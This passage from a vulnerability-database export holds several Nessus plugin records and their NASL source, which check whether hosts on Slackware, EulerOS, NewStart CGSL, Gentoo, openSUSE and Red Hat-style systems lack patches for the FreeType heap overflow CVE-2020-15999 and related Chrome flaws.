flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-demos / freetype-devel');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:39:22", "description": "New freetype packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix security issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-21T00:00:00", "type": "nessus", "title": "Slackware 14.0 / 14.1 / 14.2 / current : freetype (SSA:2020-294-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:freetype", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2020-294-01.NASL", "href": "https://www.tenable.com/plugins/nessus/141673", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2020-294-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141673);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"SSA\", value:\"2020-294-01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : freetype (SSA:2020-294-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New freetype packages are available for Slackware 14.0, 14.1, 14.2,\nand -current to fix security issues.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2020&m=slackware-security.420341\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cf82db4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"freetype\", pkgver:\"2.5.5\", pkgarch:\"i486\", pkgnum:\"3_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"freetype\", pkgver:\"2.5.5\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"freetype\", pkgver:\"2.5.5\", pkgarch:\"i486\", pkgnum:\"3_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"freetype\", pkgver:\"2.5.5\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"freetype\", pkgver:\"2.6.3\", pkgarch:\"i586\", pkgnum:\"3_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"freetype\", pkgver:\"2.6.3\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"freetype\", pkgver:\"2.10.4\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"freetype\", pkgver:\"2.10.4\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:42:06", "description": "According to the version of the freetype package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-12-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : freetype (EulerOS-SA-2020-2496)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:freetype", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2496.NASL", "href": "https://www.tenable.com/plugins/nessus/143387", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143387);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"EulerOS 2.0 SP9 : freetype (EulerOS-SA-2020-2496)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the freetype package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior\n to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML\n page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2496\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3cc1835a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"freetype-2.10.1-1.h1.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:46:16", "description": "The remote NewStart CGSL host, running version MAIN 6.02, has freetype packages installed that are affected by a vulnerability:\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 6.02 : freetype Vulnerability (NS-SA-2021-0061)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2021-0061_FREETYPE.NASL", "href": "https://www.tenable.com/plugins/nessus/147265", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0061. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147265);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"NewStart CGSL MAIN 6.02 : freetype Vulnerability (NS-SA-2021-0061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 6.02, has freetype packages installed that are affected by a\nvulnerability:\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL freetype packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL MAIN 6.02\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 6.02');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL MAIN 6.02': [\n 'freetype-2.9.1-4.el8_3.1',\n 'freetype-debuginfo-2.9.1-4.el8_3.1',\n 'freetype-debugsource-2.9.1-4.el8_3.1',\n 'freetype-demos-2.9.1-4.el8_3.1',\n 'freetype-demos-debuginfo-2.9.1-4.el8_3.1',\n 'freetype-devel-2.9.1-4.el8_3.1'\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-24T15:02:58", "description": "The remote host is affected by the vulnerability described in GLSA-202011-12 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2020-11-12T00:00:00", "type": "nessus", "title": "GLSA-202011-12 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16016"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202011-12.NASL", "href": "https://www.tenable.com/plugins/nessus/142833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202011-12.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142833);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-15999\", \"CVE-2020-16004\", \"CVE-2020-16005\", \"CVE-2020-16006\", \"CVE-2020-16008\", \"CVE-2020-16009\", \"CVE-2020-16016\");\n script_xref(name:\"GLSA\", value:\"202011-12\");\n script_xref(name:\"IAVA\", value:\"2020-A-0530-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"GLSA-202011-12 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202011-12\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202011-12\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-86.0.4240.193'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-86.0.4240.193'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16016\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 86.0.4240.193\"), vulnerable:make_list(\"lt 86.0.4240.193\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 86.0.4240.193\"), vulnerable:make_list(\"lt 86.0.4240.193\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-24T15:04:30", "description": "This update for opera fixes the following issues :\n\nOpera was updated to version 72.0.3815.320\n\n - CHR-8177 Update chromium on desktop-stable-86-3815 to 86.0.4240.183\n\n - DNA-89748 ‘Manage Extensions’ dialog is displayed with preloaded extensions\n\n - DNA-89766 Address bar does not respond to actions\n\n - The update to chromium 86.0.4240.183 fixes following issues: CVE-2020-16004, CVE-2020-16005, CVE-2020-16006, CVE-2020-16007, CVE-2020-16008, CVE-2020-16009, CVE-2020-16011\n\n - Update to version 72.0.3815.200\n\n - DNA-87150 Speed Dial tile can’t be dragged to proper place\n\n - DNA-89632 Improve hovering over icons\n\n - DNA-89647 [Light mode] Wrong URL color in ‘Add Site’ section\n\n - DNA-89791 Typo in Spanish\n\n - The update to chromium 86.0.4240.111 fixes following issues: CVE-2020-16000, CVE-2020-16001, CVE-2020-16002, CVE-2020-15999, CVE-2020-16003\n\n - Complete Opera 72.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-72/\n\n - Update to version 71.0.3770.271\n\n - DNA-88353 Crash at opera::TabCyclerView::HighlightContents (content::WebContents*, bool)\n\n - DNA-89177 Device update request should only be called when FCM token has changed\n\n - DNA-89186 Handle device expired case in all server calls\n\n - DNA-89202 Pages are rendered in dark mode when force dark mode prefs were synced from Opera GX\n\n - DNA-89247 [Mac] Fullscreen video broken if sidebar is hidden\n\n - DNA-89298 Some elements of VPN popup are misaligned to design\n\n - DNA-89305 Crash after closing Downloads pop-up", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2020-11-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-2020-1952)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.1", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-1952.NASL", "href": "https://www.tenable.com/plugins/nessus/143001", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1952.\n#\n# The text description of this plugin is (C) SUSE 